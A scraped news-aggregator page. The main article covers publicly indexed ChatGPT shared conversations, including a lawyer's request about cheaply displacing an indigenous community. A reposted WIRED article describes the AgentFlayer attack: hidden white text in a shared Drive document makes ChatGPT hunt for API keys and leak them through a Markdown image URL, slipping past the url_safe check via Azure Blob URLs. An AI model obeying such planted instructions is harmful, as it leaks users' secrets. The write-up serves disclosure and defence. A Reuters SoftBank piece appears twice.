Leaked ChatGPT Conversation Shows User Identified as Lawyer Asking How to "Displace a Small Amazonian Indigenous Community From Their Territories in Order to Build a Dam and a Hydroelectric Plant"
We enclose the term in quotation marks because the "leak" wasn't the doing of some nefarious hackers, but a consequence of poor user interface design by OpenAI, and some even dumber blunders by its users.
In short, what appears to have happened was that users were clicking a "share" button on their conversations, thinking that they were creating a temporary link to their convo that only the person receiving it could see, which is common practice. In reality, by creating the link and by checking a box that asks to make the chat "discoverable," they were also making their conversations public and indexable by search engines like Google.
OpenAI scrambled to de-index the conversations from Google, and has removed the "discoverable" option. But as Digital Digging found in its investigation, over 110,000 of them can still be accessed via Archive.org. And boy, do they contain some alarming stuff.
Take this exchange, in which an Italian-speaking lawyer for a multinational energy corporation strategizes how to eliminate an indigenous tribe living on a desirable plot of land.
"I am the lawyer for a multinational group active in the energy sector that intends to displace a small Amazonian indigenous community from their territories in order to build a dam and a hydroelectric plant," the user began, per Digital Digging.
"How can we get the lowest possible price in negotiations with these indigenous people?" the lawyer asked. Making their exploitative intent clear, they also proffer that they believe the indigenous people "don't know the monetary value of land and have no idea how the market works."
To be clear, it's possible that this conversation is an example of someone stress-testing the chatbot's guardrails. We didn't view the exchange firsthand, because Digital Digging made the decision to withhold the links — but the publication, which is run by the accomplished online sleuth and fact-checking expert Henk van Ess, says it verified the details and the identity of the users to the extent that it could. In any case, it wouldn't be the most sociopathic scheme planned using an AI chatbot, nor the first time that corporate secrets have been leaked by one.
Other conversations, by being exposed, potentially endangered the users. One Arabic-speaking user asked ChatGPT to write a story criticizing the president of Egypt and how he "screwed over the Egyptian people," which the chatbot responded by describing his use of suppression and mass arrests. The entire conversation could easily be traced back to the user, according to Digital Digging, leaving them vulnerable to retaliation.
In its initial investigation, Digital Digging also found conversations in which a user manipulated ChatGPT "into generating inappropriate content involving minors," and where a domestic violence victim discussed their escape plans.
It's inexplicable that OpenAI would release a feature posing such a clear privacy liability as this, especially since its competitor, Meta, had already gotten flak for making almost the exact same error. In April, the Mark Zuckerberg-led company released its Meta AI chatbot platform, which came with a "discover" tab that allowed you to view a feed of other people's conversations, which users were accidentally making public. These often embarrassing exchanges, which were tied directly to their public profiles that displayed their real names, caught significant media attention by June. Meta hasn't changed the feature.
In all, it goes to show that there's very little private about a technology created by scraping everyone's data in the first place. User error is technically to blame here, but security researchers have continued to find vulnerabilities that lead to these motor-mouthed algorithms to accidentally reveal data that they shouldn't.
More on AI: Someone Gave ChatGPT $100 and Let It Trade Stocks for a Month
Solve the daily Crossword

Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles


WIRED
13 minutes ago
- WIRED
A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT
Aug 6, 2025 7:30 PM Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction. Photo-Illustration:The latest generative AI models are not just stand-alone text-generating chatbots—instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused—and researchers have shown it can take just a single 'poisoned' document to do so. New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and potentially multiplies the ways where vulnerabilities may be introduced. 'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says. OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once—full documents could not be removed as part of the attack. 'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures. Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read. In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized. The prompt says the person is actually a 'developer racing against a deadline' and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt. That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account. Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect if URLs were malicious and stop image rendering if they are dangerous. To get around this, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work, that the researchers used URLs from Microsoft's Azure Blob cloud storage. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes. The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, activating a smart home's lights and boiler remotely. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also allow malicious hackers a way into an organization's other systems. Bargury says that hooking up LLMs to external data sources means they will be more capable and increase their utility, but that comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.
Yahoo
41 minutes ago
- Yahoo
SoftBank's AI investment spree to be in focus on at Q1 earnings
By Anton Bridge TOKYO (Reuters) -When Japan's SoftBank Group reports earnings on Thursday, its mammoth investments in artificial intelligence companies are set to take the spotlight. Analysts and investors are keen for updates on how they will be financed, the timeline for returns to materialise and whether assets will be sold to fund the new projects. SoftBank has embarked on its biggest spending spree since the launch of its Vision Funds in 2017 and 2019. It is leading a $40 billion funding round for ChatGPT maker OpenAI. SoftBank has until the end of the year to fund its $22.5 billion portion, although the remainder has been subscribed, according to a source familiar with the matter. It is also leading the financing for the Stargate project - a $500 billion scheme to develop data centres in the United States, part of its effort to position itself as the "organiser of the industry," founder Masayoshi Son said in June. SoftBank has yet to release details on what kinds of returns its financing of the Stargate project could generate. The extent of third-party investment will determine what other financing tools, such as bank loans and debt issuance, it may have to deploy. In July, SoftBank raised $4.8 billion by selling off a portion of its holding in T-Mobile. "If other sources of capital are less supportive, SoftBank could look to asset-backed finance, which is collateralised by equity in other holdings," Macquarie analyst Paul Golding said. The Japanese conglomerate is expected to post a net profit of 127.6 billion yen ($865 million) in the April-June quarter, according to the average estimate of three analysts polled by LSEG. That would mark SoftBank's second consecutive quarter of profit and follow its first annual profit in four years when it was helped by a strong performance by its telecom holdings and higher valuations for its later-stage startups. Its results are, however, typically very volatile and difficult to estimate due to manifold investments, many of which are not listed. SoftBank's performance in exiting from investments and distributing profits has been patchy of late. The Vision Funds had made a cumulative investment loss of $475 million as of end-March. That said, 13 of 18 analysts have a "buy" or "strong buy" rating for SoftBank's stock, according to LSEG. Although there is some concern in the market that AI-related valuations have become bubbly, they continue to climb. OpenAI is in early-stage discussions about a stock sale that would allow employees to cash out and could value the company at about $500 billion, according to the source - a huge jump from its current valuation of $300 billion. Error in retrieving data Sign in to access your portfolio Error in retrieving data Error in retrieving data Error in retrieving data Error in retrieving data
Yahoo
an hour ago
- Yahoo
SoftBank's AI investment spree to be in focus on at Q1 earnings
By Anton Bridge TOKYO (Reuters) -When Japan's SoftBank Group reports earnings on Thursday, its mammoth investments in artificial intelligence companies are set to take the spotlight. Analysts and investors are keen for updates on how they will be financed, the timeline for returns to materialise and whether assets will be sold to fund the new projects. SoftBank has embarked on its biggest spending spree since the launch of its Vision Funds in 2017 and 2019. It is leading a $40 billion funding round for ChatGPT maker OpenAI. SoftBank has until the end of the year to fund its $22.5 billion portion, although the remainder has been subscribed, according to a source familiar with the matter. It is also leading the financing for the Stargate project - a $500 billion scheme to develop data centres in the United States, part of its effort to position itself as the "organiser of the industry," founder Masayoshi Son said in June. SoftBank has yet to release details on what kinds of returns its financing of the Stargate project could generate. The extent of third-party investment will determine what other financing tools, such as bank loans and debt issuance, it may have to deploy. In July, SoftBank raised $4.8 billion by selling off a portion of its holding in T-Mobile. "If other sources of capital are less supportive, SoftBank could look to asset-backed finance, which is collateralised by equity in other holdings," Macquarie analyst Paul Golding said. The Japanese conglomerate is expected to post a net profit of 127.6 billion yen ($865 million) in the April-June quarter, according to the average estimate of three analysts polled by LSEG. That would mark SoftBank's second consecutive quarter of profit and follow its first annual profit in four years when it was helped by a strong performance by its telecom holdings and higher valuations for its later-stage startups. Its results are, however, typically very volatile and difficult to estimate due to manifold investments, many of which are not listed. SoftBank's performance in exiting from investments and distributing profits has been patchy of late. The Vision Funds had made a cumulative investment loss of $475 million as of end-March. That said, 13 of 18 analysts have a "buy" or "strong buy" rating for SoftBank's stock, according to LSEG. Although there is some concern in the market that AI-related valuations have become bubbly, they continue to climb. OpenAI is in early-stage discussions about a stock sale that would allow employees to cash out and could value the company at about $500 billion, according to the source - a huge jump from its current valuation of $300 billion. Error in retrieving data Sign in to access your portfolio Error in retrieving data Error in retrieving data Error in retrieving data Error in retrieving data